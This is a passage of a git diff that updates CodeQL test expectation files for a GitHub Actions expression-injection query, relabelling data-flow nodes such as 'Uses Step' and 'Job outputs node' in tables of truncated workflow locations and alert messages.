.github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | +| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | nodes -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | | .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | | .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | @@ -68,17 +68,17 @@ nodes | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | @@ -89,9 +89,9 @@ nodes | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | semmle.label | Job outputs node [matrix] | | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | semmle.label | Uses Step: set-matrix | | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | | .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | @@ -130,20 +130,20 @@ nodes | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | | .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | | .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | @@ -215,7 +215,7 @@ subpaths | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index 13c81bd08e0b..b21ac80574bb 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected @@ -1,58 +1,58 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | | .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | +| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | +| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | nodes -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | | .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | | .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | @@ -68,17 +68,17 @@ nodes | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | 